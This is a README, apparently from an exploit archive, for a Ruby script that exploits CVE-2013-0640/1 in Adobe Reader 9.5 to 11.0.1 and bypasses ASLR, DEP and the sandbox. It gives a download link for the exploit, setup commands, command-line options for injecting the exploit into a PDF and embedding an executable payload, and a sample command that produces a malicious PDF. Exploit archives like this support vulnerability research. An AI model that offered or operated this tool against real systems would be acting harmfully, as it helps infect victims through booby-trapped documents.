50 lines
No EOL
1.4 KiB
Text
50 lines
No EOL
1.4 KiB
Text
CVE-2013-0640/1
|
|
Somehow, our script got on to the Russian forums :/
|
|
|
|
@w3bd3vil and @abh1sek
|
|
|
|
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29881.tar.gz
|
|
|
|
Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
|
|
=================================================================
|
|
|
|
Supported Adobe Reader Versions:
|
|
|
|
* 11.0.1
|
|
* 11.0.0
|
|
|
|
* 10.1.5
|
|
* 10.1.4
|
|
* 10.1.3
|
|
* 10.1.2
|
|
* 10.1
|
|
|
|
* 9.5
|
|
|
|
Tested on:
|
|
|
|
* Windows 7 (32 bit)
|
|
* Windows 7 (64 bit)
|
|
* Windows XP
|
|
|
|
Script Requirements:
|
|
|
|
* Run on Windows :-)
|
|
* Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)
|
|
* Gems: origami, metasm (In command prompt type, gem install metasm && gem install origami -v "=1.2.5")
|
|
|
|
FYI:
|
|
a. It's a rip, of the original exploit.
|
|
b. Works most of the times.
|
|
c. We never really got into completing our script options though.
|
|
|
|
ruby xfa_MAGIC.rb -h
|
|
Usage: xfa_MAGIC.rb [options]
|
|
-i, --input [FILE] Input PDF. If provided, exploit will be injected into it (optional)
|
|
-p, --payload [FILE] PE executable to embed in the payload
|
|
--low-mem Use Heap spray suitable for low memory environment
|
|
-o, --output [FILE] File path to write output PDF
|
|
-h, --help Show help
|
|
(Some commands are not supported at the moment)
|
|
|
|
ruby xfa_MAGIC.rb -p example.exe -o poc.pdf |